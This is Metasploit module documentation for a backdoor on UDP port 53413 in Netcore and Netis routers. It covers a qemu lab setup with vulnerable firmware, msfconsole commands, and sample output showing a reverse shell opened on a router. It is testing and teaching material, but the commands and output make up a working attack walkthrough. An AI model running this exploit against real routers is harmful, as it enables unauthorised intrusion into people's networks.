### Vulnerable Devices
Trend Micro lists "almost all" models as being vulnerable in August 2014.

Vulnerable AND Exploitable:

1. Netcore NI360 second-generation
 
Vulnerable, but not Exploitable via this module (details later):

1. Netis WF2414 firmware V1.4.27001

### Lab Emulation
1. Install qemu
2. Download and install mipsel.  Please read the [tutorial](https://people.debian.org/%7Eaurel32/qemu/mipsel/README.txt)
3. Starts the mipsel lab
 1. `qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413`
4. Put [vuln_squashfs-root.tar.gz](https://github.com/rapid7/metasploit-framework/files/267284/vuln_squashfs-root.tar.gz) to mipsel lab, extract it.
 1. `scp -P22222 vuln_squashfs-root.tar.gz root@127.0.0.1:/root`
 2. `tar xvf vuln_squashfs-root.tar.gz`
5. Run vuln programs.
 1. `cd nw614 && chroot . /bin/igdmptd`

## Verification Steps

  1. Install the emulator/hardware
  2. Start msfconsole
  3. Do: `use exploits/linux/misc/netcore_udp_53413_backdoor`
  4. Do: `set RHOST <ip>`
  5. Do: `check`
  6. Do: `exploit`
  7. You should get a shell.

## Exploitability

As previously noted, some modules are vulnerable, but not currently exploitable via Metasploit.
During [testing](https://github.com/rapid7/metasploit-framework/pull/6880#issuecomment-231597626) it was discovered that some modules implement an echo command that does not honor -ne.  While it may be possible to still execute a shell, further investigation would need to be conducted.
In these cases, it should be possible to use [other scripts](https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py) to act as a fake interactive shell.

## Scenarios

The following is an example of a vulnerable AND EXPLOITABLE router.

```
use exploits/linux/misc/netcore_udp_53413_backdoor
msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netcore_udp_53413_backdoor) > check
[+] The target is vulnerable.
msf exploit(netcore_udp_53413_backdoor) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Exploiting...
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[*] Command Stager progress -  62.70% done (980/1563 bytes)
[*] Command Stager progress -  75.24% done (1176/1563 bytes)
[*] Command Stager progress -  87.78% done (1372/1563 bytes)
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500

pwd
/
ls
bin
cfg
dev
etc
lib
linuxrc
log
proc
sbin
sh
sys
tmp
usr
var
web
```

The following is an example of a vulnerable but NOT expoitable router.

```
msf > use exploits/linux/misc/netcore_udp_53413_backdoor
msf exploit(netcore_udp_53413_backdoor) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf exploit(netcore_udp_53413_backdoor) > check

[+] Backdoor Unlocked
[*] Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.
[*] The target service is running, but could not be validated.
```